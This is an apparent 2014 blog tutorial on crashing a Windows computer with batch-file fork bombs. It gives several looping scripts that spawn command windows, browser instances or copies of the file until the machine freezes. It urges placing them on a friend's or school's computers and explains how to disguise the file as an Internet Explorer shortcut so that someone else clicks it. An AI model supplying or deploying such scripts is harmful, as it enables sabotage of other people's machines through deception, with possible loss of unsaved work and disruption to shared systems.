Monday, 30 June 2014

How to crash your computer

Step 1: Just go to notepad

Just go to notepad (start>all programs>accessories>notepad) and type exactly this script btween the lines:
___________________________________________________________________@echo off:crashstartgoto crash___________________________________________________________________

Step 2: Save as .bat

goto file>save as>crash.bat
and save! But remember when you open this file command prompt windows will open until the computer crashes or freezes so it would be better if you placed this on a friend's or the school's computers.

Step 3: Different variations

There are different scripts that you can write in notepad to get a batch file with similar reactions.
such as:
________________@echo off:startstart %0goto start_________________or_________________@echo off:1start iexplore.exegoto 1_________________or_________________@echo off:foldermd *goto folder_________________or_________________@echo off:1startecho Windows is now crashing . . .goto 1_________________

Step 4: Disguise it

When you place this file on someone else's computer you have to make the file look persuasive to click on desktop. So find the crash.bat file in documents or all files, right-click it>send to>desktop(create shortcut). Now find it on your desktop>right click>properties>change icon>change it to nternet explorer icon>apply>exit. Right click it again>rename>rename to: Internet Explorer

Step 5: Recovering from the crash

To recover your desktop (PC) from this just directly pull the plugs from your PC and put the plugs back in and start it up again or just hold the power button on your PC until it turns off and restart again. I'm not sure about how to recover from this with labtops.

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